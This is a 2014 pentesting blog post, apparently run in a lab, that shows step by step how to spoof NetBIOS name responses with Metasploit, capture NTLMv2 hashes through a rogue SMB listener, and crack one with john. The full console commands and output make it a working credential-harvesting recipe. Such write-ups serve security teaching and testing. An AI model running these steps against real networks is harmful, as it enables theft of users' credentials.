<!DOCTYPE html>
<html lang="en" dir="auto">

<head><meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="robots" content="index, follow">
<title>NetBIOS Name Spoofing and SMB | Unl0ckd</title>
<meta name="keywords" content="pentesting, netbios, smb, authentication" />
<meta name="description" content="NBNS still works!">
<meta name="author" content="Me">
<link rel="canonical" href="https://www.chrislockard.net/posts/netbios-name-spoofing-and-smb/" />
<link crossorigin="anonymous" href="/assets/css/stylesheet.min.c88963fe2d79462000fd0fb1b3737783c32855d340583e4523343f8735c787f0.css" integrity="sha256-yIlj/i15RiAA/Q&#43;xs3N3g8MoVdNAWD5FIzQ/hzXHh/A=" rel="preload stylesheet" as="style">
<link rel="preload" href="/apple-touch-icon.png" as="image">
<script defer crossorigin="anonymous" src="/assets/js/highlight.min.7680afc38aa6b15ddf158a4f3780b7b1f7dde7e91d26f073e6229bb7a0793c92.js" integrity="sha256-doCvw4qmsV3fFYpPN4C3sffd5&#43;kdJvBz5iKbt6B5PJI="
    onload="hljs.initHighlightingOnLoad();"></script>
<link rel="icon" href="https://www.chrislockard.net/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="https://www.chrislockard.net/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://www.chrislockard.net/favicon-32x32.png">
<link rel="apple-touch-icon" href="https://www.chrislockard.net/apple-touch-icon.png">
<link rel="mask-icon" href="https://www.chrislockard.net/favicon-32x32.png">
<meta name="theme-color" content="#2e2e33">
<meta name="msapplication-TileColor" content="#2e2e33">
<meta name="generator" content="Hugo 0.91.2" />
<noscript>
    <style>
        #theme-toggle,
        .top-link {
            display: none;
        }

    </style>
    <style>
        @media (prefers-color-scheme: dark) {
            :root {
                --theme: rgb(29, 30, 32);
                --entry: rgb(46, 46, 51);
                --primary: rgb(218, 218, 219);
                --secondary: rgb(155, 156, 157);
                --tertiary: rgb(65, 66, 68);
                --content: rgb(196, 196, 197);
                --hljs-bg: rgb(46, 46, 51);
                --code-bg: rgb(55, 56, 62);
                --border: rgb(51, 51, 51);
            }

            .list {
                background: var(--theme);
            }

            .list:not(.dark)::-webkit-scrollbar-track {
                background: 0 0;
            }

            .list:not(.dark)::-webkit-scrollbar-thumb {
                border-color: var(--theme);
            }
        }

    </style>
</noscript><meta property="og:title" content="NetBIOS Name Spoofing and SMB" />
<meta property="og:description" content="NBNS still works!" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.chrislockard.net/posts/netbios-name-spoofing-and-smb/" /><meta property="og:image" content="https://www.chrislockard.net/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"/><meta property="article:section" content="post" />
<meta property="article:published_time" content="2014-06-05T12:00:00-04:00" />
<meta property="article:modified_time" content="2014-06-05T12:00:00-04:00" /><meta property="og:site_name" content="Unl0ckd" />

<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://www.chrislockard.net/%3Clink%20or%20path%20of%20image%20for%20opengraph,%20twitter-cards%3E"/>

<meta name="twitter:title" content="NetBIOS Name Spoofing and SMB"/>
<meta name="twitter:description" content="NBNS still works!"/>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [
    {
      "@type": "ListItem",
      "position":  1 ,
      "name": "Posts",
      "item": "https://www.chrislockard.net/post/"
    }, 
    {
      "@type": "ListItem",
      "position":  2 ,
      "name": "NetBIOS Name Spoofing and SMB",
      "item": "https://www.chrislockard.net/posts/netbios-name-spoofing-and-smb/"
    }
  ]
}
</script>
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "NetBIOS Name Spoofing and SMB",
  "name": "NetBIOS Name Spoofing and SMB",
  "description": "NBNS still works!",
  "keywords": [
    "pentesting", "netbios", "smb", "authentication"
  ],
  "articleBody": "This is a fun technique for harvesting user credentials that still works: NetBIOS name spoofing. NetBIOS is a Session layer technology from the early 1980’s that is still in use on networks today. Today, NetBIOS is used predominately in Windows networks as the session service for Server Message Block (SMB) aka Common Internet File System (CIFS), an Application layer technology for sharing files, printers, and inter process communication (IPC).\nStart the NetBIOS Name Spoofing Using Metasploit, load the auxiliary/spoof/nbns/nbns_response module:\nmsf use auxiliary/spoof/nbns/nbns_response msf auxiliary(nbns_response)  show options Module options (auxiliary/spoof/nbns/nbns_response): Name Current Setting Required Description ---- --------------- -------- ----------- INTERFACE no The name of the interface REGEX .* yes Regex applied to the NB Name to determine if spoofed reply is sent SPOOFIP 127.0.0.1 yes IP address with which to poison responses TIMEOUT 500 yes The number of seconds to wait for new data We are most interested in the “SPOOFIP” option, as this is the IP address our spoofed responses will come from. Note that this module will not work well with Network Address Translation (NAT), as the NetBIOS protocol itself is not NAT-friendly see this article. The “REGEX” option allows you to match on parts of the NetBIOS name you want to target, if you are targeting a specific host on the network. If this is left blank, all NetBIOS requests to your host will be handled by this module.\nUseful NetBIOS Spoofing Now that we can spoof a legitimate host’s NetBIOS response, let’s use this capability to capture a user’s NTLM hash from SMB requests. For detailed information on NTLM authentication over SMB, see Microsoft’s documentation on MSDN. In summary, a typical NTLM authentication session over SMB looks like this:\n Client sends SMB_COM_NEGOTIATE request Server replies with SMB_COM_NEGOTIATE response Client sends NTLM NEGOTIATE_MESSAGE request Server replies with NTLM CHALLENGE_MESSAGE response Client sends NTLM AUTHENTICATE_MESSAGE request Server replies with SMB_COM_SESSION_SETUP response  We will attack the negotiations in steps 4 and 5 using a Metasploit module to create a service which will respond to SMB requests. This will afford us the opportunity to create a predictable NTLM CHALLENGE_MESSAGE (Step 4) for submission to the client. This message normally includes an 8-bit random value, however, since we are the SMB server, we can control the value. When the client responds to this challenge with NTLM AUTHENTICATE_MESSAGE, it will include the NTLM hash of the user’s password!\nFrom Metasploit, load the auxiliary/server/capture/smb module:\nmsf auxiliary(nbns_response)  use auxiliary/server/capture/smb msf auxiliary(smb)  show options Module options (auxiliary/server/capture/smb): Name Current Setting Required Description ---- --------------- -------- ----------- CAINPWFILE no The local filename to store the hashes in Cain\u0026Abel format CHALLENGE 1122334455667788 yes The 8 byte challenge JOHNPWFILE no The prefix to the local filename to store the hashes in JOHN format SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 445 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) Most of these values are fine left as default, but take note of the CAINPWFILE and JOHNPWFILE settings. These will dump client responses into files prepared for use by these tools. Awesome! I prefer to use john for password attacks, so I will set the JOHNPWFILE and begin the exploit:\nmsf auxiliary(smb)  set JOHNPWFILE /tmp/john_pw.log JOHNPWFILE = /tmp/john_pw.log msf auxiliary(smb)  exploit -j -z [*] Auxiliary module running as background job Now I just need to wait for a victim to connect… (Here I am forcing the connection from a Windows 7 VM)\nHere’s what the client sees:\n  SMB auth\n  And here’s what we capture on our end:\n  SMB capture\n  Almost there. Now, run john against the NTLM hash…\n$ john --wordlist=/tmp/wordlist.txt john_pw.log_netntlmv2 Loaded 4 password hashes with 4 different salts (NTLMv2 C/R MD4 HMAC-MD5 [32/64]) eve (dagorim) Great! Now it’s time for further fun.\nNot the Newest Tool in the Box This technique still works, though.\n",
  "wordCount" : "682",
  "inLanguage": "en",
  "datePublished": "2014-06-05T12:00:00-04:00",
  "dateModified": "2014-06-05T12:00:00-04:00",
  "author":{
    "@type": "Person",
    "name": "Me"
  },
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "https://www.chrislockard.net/posts/netbios-name-spoofing-and-smb/"
  },
  "publisher": {
    "@type": "Organization",
    "name": "Unl0ckd",
    "logo": {
      "@type": "ImageObject",
      "url": "https://www.chrislockard.net/favicon.ico"
    }
  }
}
</script>
</head>

<body class="" id="top">
<script>
    if (localStorage.getItem("pref-theme") === "dark") {
        document.body.classList.add('dark');
    } else if (localStorage.getItem("pref-theme") === "light") {
        document.body.classList.remove('dark')
    } else if (window.matchMedia('(prefers-color-scheme: dark)').matches) {
        document.body.classList.add('dark');
    }

</script>

<header class="header">
    <nav class="nav">
        <div class="logo">
            <a href="https://www.chrislockard.net/" accesskey="h" title="Home (Alt + H)">
                <img src="/apple-touch-icon.png" alt="logo" aria-label="logo"
                    height="35">Home</a>
            <span class="logo-switches">
                <button id="theme-toggle" accesskey="t" title="(Alt + T)">
                    <svg id="moon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path>
                    </svg>
                    <svg id="sun" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"
                        fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round"
                        stroke-linejoin="round">
                        <circle cx="12" cy="12" r="5"></circle>
                        <line x1="12" y1="1" x2="12" y2="3"></line>
                        <line x1="12" y1="21" x2="12" y2="23"></line>
                        <line x1="4.22" y1="4.22" x2="5.64" y2="5.64"></line>
                        <line x1="18.36" y1="18.36" x2="19.78" y2="19.78"></line>
                        <line x1="1" y1="12" x2="3" y2="12"></line>
                        <line x1="21" y1="12" x2="23" y2="12"></line>
                        <line x1="4.22" y1="19.78" x2="5.64" y2="18.36"></line>
                        <line x1="18.36" y1="5.64" x2="19.78" y2="4.22"></line>
                    </svg>
                </button>
            </span>
        </div>
        <ul id="menu">
            <li>
                <a href="https://www.chrislockard.net/categories/" title="categories">
                    <span>categories</span>
                </a>
            </li>
            <li>
                <a href="https://www.chrislockard.net/tags/" title="tags">
                    <span>tags</span>
                </a>
            </li>
            <li>
                <a href="https://www.chrislockard.net/post/" title="posts">
                    <span>posts</span>
                </a>
            </li>
        </ul>
    </nav>
</header>
<main class="main">

<article class="post-single">
  <header class="post-header">
    <div class="breadcrumbs"><a href="https://www.chrislockard.net/">Home</a>&nbsp;»&nbsp;<a href="https://www.chrislockard.net/post/">Posts</a></div>
    <h1 class="post-title">
      NetBIOS Name Spoofing and SMB
    </h1>
    <div class="post-meta"><span title='2014-06-05 12:00:00 -0400 EDT'>June 5, 2014</span>&nbsp;·&nbsp;4 min&nbsp;·&nbsp;Me&nbsp;|&nbsp;<a href="https://github.com/chrislockard/chrislockard.net" rel="noopener noreferrer" target="_blank">Suggest Changes</a>

</div>
  </header> <div class="toc">
    <details  open>
        <summary accesskey="c" title="(Alt + C)">
            <span class="details">Table of Contents</span>
        </summary>

        <div class="inner"><ul>
                <li>
                    <a href="#start-the-netbios-name-spoofing" aria-label="Start the NetBIOS Name Spoofing">Start the NetBIOS Name Spoofing</a></li>
                <li>
                    <a href="#useful-netbios-spoofing" aria-label="Useful NetBIOS Spoofing">Useful NetBIOS Spoofing</a></li>
                <li>
                    <a href="#not-the-newest-tool-in-the-box" aria-label="Not the Newest Tool in the Box">Not the Newest Tool in the Box</a>
                </li>
            </ul>
        </div>
    </details>
</div>

  <div class="post-content"><p>This is a fun technique for harvesting user credentials that still works:
NetBIOS name spoofing. NetBIOS is a Session layer technology from the early
1980&rsquo;s that is still in use on networks today. Today, NetBIOS is used
predominately in Windows networks as the session service for Server Message
Block (SMB) aka Common Internet File System (CIFS), an Application layer
technology for sharing files, printers, and inter process communication (IPC).</p>
<h1 id="start-the-netbios-name-spoofing">Start the NetBIOS Name Spoofing<a hidden class="anchor" aria-hidden="true" href="#start-the-netbios-name-spoofing">#</a></h1>
<p>Using Metasploit, load the auxiliary/spoof/nbns/nbns_response module:</p>
<pre tabindex="0"><code>msf&gt; use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) &gt; show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      .*               yes       Regex applied to the NB Name to determine if spoofed reply is     sent
   SPOOFIP    127.0.0.1        yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data
</code></pre><p>We are most interested in the &ldquo;SPOOFIP&rdquo; option, as this is the IP address our
spoofed responses will come from. Note that this module will not work well with
Network Address Translation (NAT), as the NetBIOS protocol itself is not
NAT-friendly see <a href="http://www.faughnan.com/netbios.html">this article</a>. The &ldquo;REGEX&rdquo; option allows you to
match on parts of the NetBIOS name you want to target, if you are targeting a
specific host on the network. If this is left blank, all NetBIOS requests to
your host will be handled by this module.</p>
<h1 id="useful-netbios-spoofing">Useful NetBIOS Spoofing<a hidden class="anchor" aria-hidden="true" href="#useful-netbios-spoofing">#</a></h1>
<p>Now that we can spoof a legitimate host&rsquo;s NetBIOS response, let&rsquo;s use this
capability to capture a user&rsquo;s NTLM hash from SMB requests. For detailed
information on NTLM authentication over SMB, <a href="http://msdn.microsoft.com/en-us/library/cc669093.aspx">see Microsoft&rsquo;s documentation on
MSDN</a>. In summary, a typical NTLM authentication session over SMB
looks like this:</p>
<ol>
<li>Client sends SMB_COM_NEGOTIATE request</li>
<li>Server replies with SMB_COM_NEGOTIATE response</li>
<li>Client sends NTLM NEGOTIATE_MESSAGE request</li>
<li>Server replies with NTLM CHALLENGE_MESSAGE response</li>
<li>Client sends NTLM AUTHENTICATE_MESSAGE request</li>
<li>Server replies with SMB_COM_SESSION_SETUP response</li>
</ol>
<p>We will attack the negotiations in steps 4 and 5 using a Metasploit module to
create a service which will respond to SMB requests. This will afford us the
opportunity to create a predictable NTLM CHALLENGE_MESSAGE (Step 4) for
submission to the client. This message normally includes an 8-bit random value,
however, since we are the SMB server, we can control the value. When the client
responds to this challenge with NTLM AUTHENTICATE_MESSAGE, it will include the
NTLM hash of the user&rsquo;s password!</p>
<p>From Metasploit, load the auxiliary/server/capture/smb module:</p>
<pre tabindex="0"><code>msf auxiliary(nbns_response) &gt; use auxiliary/server/capture/smb
msf auxiliary(smb) &gt; show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&amp;Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge 
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
</code></pre><p>Most of these values are fine left as default, but take note of the CAINPWFILE
and JOHNPWFILE settings. These will dump client responses into files prepared
for use by these tools. Awesome! I prefer to use john for password attacks, so I
will set the JOHNPWFILE and begin the exploit:</p>
<pre tabindex="0"><code>msf auxiliary(smb) &gt; set JOHNPWFILE /tmp/john_pw.log
JOHNPWFILE =&gt; /tmp/john_pw.log
msf auxiliary(smb) &gt; exploit -j -z
[*] Auxiliary module running as background job
</code></pre><p>Now I just need to wait for a victim to connect&hellip;  (Here I am forcing the
connection from a Windows 7 VM)</p>
<p>Here&rsquo;s what the client sees:</p>
<figure>
    <img loading="lazy" src="/images/2014/06-05-1.png"
         alt="SMB auth"/> <figcaption>
            <p>SMB auth</p>
        </figcaption>
</figure>

<p>And here&rsquo;s what we capture on our end:</p>
<figure>
    <img loading="lazy" src="/images/2014/06-05-2.png"
         alt="SMB capture"/> <figcaption>
            <p>SMB capture</p>
        </figcaption>
</figure>

<p>Almost there. Now, run <code>john</code> against the NTLM hash&hellip;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ john --wordlist<span style="color:#f92672">=</span>/tmp/wordlist.txt john_pw.log_netntlmv2
Loaded <span style="color:#ae81ff">4</span> password hashes with <span style="color:#ae81ff">4</span> different salts <span style="color:#f92672">(</span>NTLMv2 C/R MD4 HMAC-MD5 <span style="color:#f92672">[</span>32/64<span style="color:#f92672">])</span>
eve              <span style="color:#f92672">(</span>dagorim<span style="color:#f92672">)</span>
</code></pre></div><p>Great! Now it&rsquo;s time for further fun.</p>
<h1 id="not-the-newest-tool-in-the-box">Not the Newest Tool in the Box<a hidden class="anchor" aria-hidden="true" href="#not-the-newest-tool-in-the-box">#</a></h1>
<p>This technique still works, though.</p>


  </div>

  <footer class="post-footer">
    <ul class="post-tags">
      <li><a href="https://www.chrislockard.net/tags/pentesting/">pentesting</a></li>
      <li><a href="https://www.chrislockard.net/tags/netbios/">netbios</a></li>
      <li><a href="https://www.chrislockard.net/tags/smb/">smb</a></li>
      <li><a href="https://www.chrislockard.net/tags/authentication/">authentication</a></li>
    </ul>
<nav class="paginav">
  <a class="prev" href="https://www.chrislockard.net/posts/local-file-inclusion-mini-list/">
    <span class="title">« Prev Page</span>
    <br>
    <span>Local File Inclusion Mini-list</span>
  </a>
  <a class="next" href="https://www.chrislockard.net/posts/how-to-create-a-metasploit-module/">
    <span class="title">Next Page »</span>
    <br>
    <span>How to create a Metasploit module</span>
  </a>
</nav>


<div class="share-buttons">
    <a target="_blank" rel="noopener noreferrer" aria-label="share NetBIOS Name Spoofing and SMB on twitter"
        href="https://twitter.com/intent/tweet/?text=NetBIOS%20Name%20Spoofing%20and%20SMB&amp;url=https%3a%2f%2fwww.chrislockard.net%2fposts%2fnetbios-name-spoofing-and-smb%2f&amp;hashtags=pentesting%2cnetbios%2csmb%2cauthentication">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-253.927,424.544c135.939,0 210.268,-112.643 210.268,-210.268c0,-3.218 0,-6.437 -0.153,-9.502c14.406,-10.421 26.973,-23.448 36.935,-38.314c-13.18,5.824 -27.433,9.809 -42.452,11.648c15.326,-9.196 26.973,-23.602 32.49,-40.92c-14.252,8.429 -30.038,14.56 -46.896,17.931c-13.487,-14.406 -32.644,-23.295 -53.946,-23.295c-40.767,0 -73.87,33.104 -73.87,73.87c0,5.824 0.613,11.494 1.992,16.858c-61.456,-3.065 -115.862,-32.49 -152.337,-77.241c-6.284,10.881 -9.962,23.601 -9.962,37.088c0,25.594 13.027,48.276 32.95,61.456c-12.107,-0.307 -23.448,-3.678 -33.41,-9.196l0,0.92c0,35.862 25.441,65.594 59.311,72.49c-6.13,1.686 -12.72,2.606 -19.464,2.606c-4.751,0 -9.348,-0.46 -13.946,-1.38c9.349,29.426 36.628,50.728 68.965,51.341c-25.287,19.771 -57.164,31.571 -91.8,31.571c-5.977,0 -11.801,-0.306 -17.625,-1.073c32.337,21.15 71.264,33.41 112.95,33.41Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share NetBIOS Name Spoofing and SMB on linkedin"
        href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3a%2f%2fwww.chrislockard.net%2fposts%2fnetbios-name-spoofing-and-smb%2f&amp;title=NetBIOS%20Name%20Spoofing%20and%20SMB&amp;summary=NetBIOS%20Name%20Spoofing%20and%20SMB&amp;source=https%3a%2f%2fwww.chrislockard.net%2fposts%2fnetbios-name-spoofing-and-smb%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-288.985,423.278l0,-225.717l-75.04,0l0,225.717l75.04,0Zm270.539,0l0,-129.439c0,-69.333 -37.018,-101.586 -86.381,-101.586c-39.804,0 -57.634,21.891 -67.617,37.266l0,-31.958l-75.021,0c0.995,21.181 0,225.717 0,225.717l75.02,0l0,-126.056c0,-6.748 0.486,-13.492 2.474,-18.315c5.414,-13.475 17.767,-27.434 38.494,-27.434c27.135,0 38.007,20.707 38.007,51.037l0,120.768l75.024,0Zm-307.552,-334.556c-25.674,0 -42.448,16.879 -42.448,39.002c0,21.658 16.264,39.002 41.455,39.002l0.484,0c26.165,0 42.452,-17.344 42.452,-39.002c-0.485,-22.092 -16.241,-38.954 -41.943,-39.002Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share NetBIOS Name Spoofing and SMB on reddit"
        href="https://reddit.com/submit?url=https%3a%2f%2fwww.chrislockard.net%2fposts%2fnetbios-name-spoofing-and-smb%2f&title=NetBIOS%20Name%20Spoofing%20and%20SMB">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-3.446,265.638c0,-22.964 -18.616,-41.58 -41.58,-41.58c-11.211,0 -21.361,4.457 -28.841,11.666c-28.424,-20.508 -67.586,-33.757 -111.204,-35.278l18.941,-89.121l61.884,13.157c0.756,15.734 13.642,28.29 29.56,28.29c16.407,0 29.706,-13.299 29.706,-29.701c0,-16.403 -13.299,-29.702 -29.706,-29.702c-11.666,0 -21.657,6.792 -26.515,16.578l-69.105,-14.69c-1.922,-0.418 -3.939,-0.042 -5.585,1.036c-1.658,1.073 -2.811,2.761 -3.224,4.686l-21.152,99.438c-44.258,1.228 -84.046,14.494 -112.837,35.232c-7.468,-7.164 -17.589,-11.591 -28.757,-11.591c-22.965,0 -41.585,18.616 -41.585,41.58c0,16.896 10.095,31.41 24.568,37.918c-0.639,4.135 -0.99,8.328 -0.99,12.576c0,63.977 74.469,115.836 166.33,115.836c91.861,0 166.334,-51.859 166.334,-115.836c0,-4.218 -0.347,-8.387 -0.977,-12.493c14.564,-6.47 24.735,-21.034 24.735,-38.001Zm-119.474,108.193c-20.27,20.241 -59.115,21.816 -70.534,21.816c-11.428,0 -50.277,-1.575 -70.522,-21.82c-3.007,-3.008 -3.007,-7.882 0,-10.889c3.003,-2.999 7.882,-3.003 10.885,0c12.777,12.781 40.11,17.317 59.637,17.317c19.522,0 46.86,-4.536 59.657,-17.321c3.016,-2.999 7.886,-2.995 10.885,0.008c3.008,3.011 3.003,7.882 -0.008,10.889Zm-5.23,-48.781c-16.373,0 -29.701,-13.324 -29.701,-29.698c0,-16.381 13.328,-29.714 29.701,-29.714c16.378,0 29.706,13.333 29.706,29.714c0,16.374 -13.328,29.698 -29.706,29.698Zm-160.386,-29.702c0,-16.381 13.328,-29.71 29.714,-29.71c16.369,0 29.689,13.329 29.689,29.71c0,16.373 -13.32,29.693 -29.689,29.693c-16.386,0 -29.714,-13.32 -29.714,-29.693Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share NetBIOS Name Spoofing and SMB on facebook"
        href="https://facebook.com/sharer/sharer.php?u=https%3a%2f%2fwww.chrislockard.net%2fposts%2fnetbios-name-spoofing-and-smb%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-106.468,0l0,-192.915l66.6,0l12.672,-82.621l-79.272,0l0,-53.617c0,-22.603 11.073,-44.636 46.58,-44.636l36.042,0l0,-70.34c0,0 -32.71,-5.582 -63.982,-5.582c-65.288,0 -107.96,39.569 -107.96,111.204l0,62.971l-72.573,0l0,82.621l72.573,0l0,192.915l-191.104,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share NetBIOS Name Spoofing and SMB on whatsapp"
        href="https://api.whatsapp.com/send?text=NetBIOS%20Name%20Spoofing%20and%20SMB%20-%20https%3a%2f%2fwww.chrislockard.net%2fposts%2fnetbios-name-spoofing-and-smb%2f">
        <svg version="1.1" viewBox="0 0 512 512" xml:space="preserve">
            <path
                d="M449.446,0c34.525,0 62.554,28.03 62.554,62.554l0,386.892c0,34.524 -28.03,62.554 -62.554,62.554l-386.892,0c-34.524,0 -62.554,-28.03 -62.554,-62.554l0,-386.892c0,-34.524 28.029,-62.554 62.554,-62.554l386.892,0Zm-58.673,127.703c-33.842,-33.881 -78.847,-52.548 -126.798,-52.568c-98.799,0 -179.21,80.405 -179.249,179.234c-0.013,31.593 8.241,62.428 23.927,89.612l-25.429,92.884l95.021,-24.925c26.181,14.28 55.659,21.807 85.658,21.816l0.074,0c98.789,0 179.206,-80.413 179.247,-179.243c0.018,-47.895 -18.61,-92.93 -52.451,-126.81Zm-126.797,275.782l-0.06,0c-26.734,-0.01 -52.954,-7.193 -75.828,-20.767l-5.441,-3.229l-56.386,14.792l15.05,-54.977l-3.542,-5.637c-14.913,-23.72 -22.791,-51.136 -22.779,-79.287c0.033,-82.142 66.867,-148.971 149.046,-148.971c39.793,0.014 77.199,15.531 105.329,43.692c28.128,28.16 43.609,65.592 43.594,105.4c-0.034,82.149 -66.866,148.983 -148.983,148.984Zm81.721,-111.581c-4.479,-2.242 -26.499,-13.075 -30.604,-14.571c-4.105,-1.495 -7.091,-2.241 -10.077,2.241c-2.986,4.483 -11.569,14.572 -14.182,17.562c-2.612,2.988 -5.225,3.364 -9.703,1.12c-4.479,-2.241 -18.91,-6.97 -36.017,-22.23c-13.314,-11.876 -22.304,-26.542 -24.916,-31.026c-2.612,-4.484 -0.279,-6.908 1.963,-9.14c2.016,-2.007 4.48,-5.232 6.719,-7.847c2.24,-2.615 2.986,-4.484 4.479,-7.472c1.493,-2.99 0.747,-5.604 -0.374,-7.846c-1.119,-2.241 -10.077,-24.288 -13.809,-33.256c-3.635,-8.733 -7.327,-7.55 -10.077,-7.688c-2.609,-0.13 -5.598,-0.158 -8.583,-0.158c-2.986,0 -7.839,1.121 -11.944,5.604c-4.105,4.484 -15.675,15.32 -15.675,37.364c0,22.046 16.048,43.342 18.287,46.332c2.24,2.99 31.582,48.227 76.511,67.627c10.685,4.615 19.028,7.371 25.533,9.434c10.728,3.41 20.492,2.929 28.209,1.775c8.605,-1.285 26.499,-10.833 30.231,-21.295c3.732,-10.464 3.732,-19.431 2.612,-21.298c-1.119,-1.869 -4.105,-2.99 -8.583,-5.232Z" />
        </svg>
    </a>
    <a target="_blank" rel="noopener noreferrer" aria-label="share NetBIOS Name Spoofing and SMB on telegram"
        href="https://telegram.me/share/url?text=NetBIOS%20Name%20Spoofing%20and%20SMB&amp;url=https%3a%2f%2fwww.chrislockard.net%2fposts%2fnetbios-name-spoofing-and-smb%2f">
        <svg version="1.1" xml:space="preserve" viewBox="2 2 28 28">
            <path
                d="M26.49,29.86H5.5a3.37,3.37,0,0,1-2.47-1,3.35,3.35,0,0,1-1-2.47V5.48A3.36,3.36,0,0,1,3,3,3.37,3.37,0,0,1,5.5,2h21A3.38,3.38,0,0,1,29,3a3.36,3.36,0,0,1,1,2.46V26.37a3.35,3.35,0,0,1-1,2.47A3.38,3.38,0,0,1,26.49,29.86Zm-5.38-6.71a.79.79,0,0,0,.85-.66L24.73,9.24a.55.55,0,0,0-.18-.46.62.62,0,0,0-.41-.17q-.08,0-16.53,6.11a.59.59,0,0,0-.41.59.57.57,0,0,0,.43.52l4,1.24,1.61,4.83a.62.62,0,0,0,.63.43.56.56,0,0,0,.4-.17L16.54,20l4.09,3A.9.9,0,0,0,21.11,23.15ZM13.8,20.71l-1.21-4q8.72-5.55,8.78-5.55c.15,0,.23,0,.23.16a.18.18,0,0,1,0,.06s-2.51,2.3-7.52,6.8Z" />
        </svg>
    </a>
</div>

  </footer>
</article>
    </main>
    
<footer class="footer">
    <span>&copy; 2022 <a href="https://www.chrislockard.net/">Unl0ckd</a></span>
    <span>
        Powered by
        <a href="https://gohugo.io/" rel="noopener noreferrer" target="_blank">Hugo</a> &
        <a href="https://git.io/hugopapermod" rel="noopener" target="_blank">PaperMod</a>
    </span>
</footer>
<a href="#top" aria-label="go to top" title="Go to Top (Alt + G)" class="top-link" id="top-link" accesskey="g">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 12 6" fill="currentColor">
        <path d="M12 6H0l6-6z" />
    </svg>
</a>

<script>
    let menu = document.getElementById('menu')
    if (menu) {
        menu.scrollLeft = localStorage.getItem("menu-scroll-position");
        menu.onscroll = function () {
            localStorage.setItem("menu-scroll-position", menu.scrollLeft);
        }
    }

    document.querySelectorAll('a[href^="#"]').forEach(anchor => {
        anchor.addEventListener("click", function (e) {
            e.preventDefault();
            var id = this.getAttribute("href").substr(1);
            if (!window.matchMedia('(prefers-reduced-motion: reduce)').matches) {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView({
                    behavior: "smooth"
                });
            } else {
                document.querySelector(`[id='${decodeURIComponent(id)}']`).scrollIntoView();
            }
            if (id === "top") {
                history.replaceState(null, null, " ");
            } else {
                history.pushState(null, null, `#${id}`);
            }
        });
    });

</script>
<script>
    var mybutton = document.getElementById("top-link");
    window.onscroll = function () {
        if (document.body.scrollTop > 800 || document.documentElement.scrollTop > 800) {
            mybutton.style.visibility = "visible";
            mybutton.style.opacity = "1";
        } else {
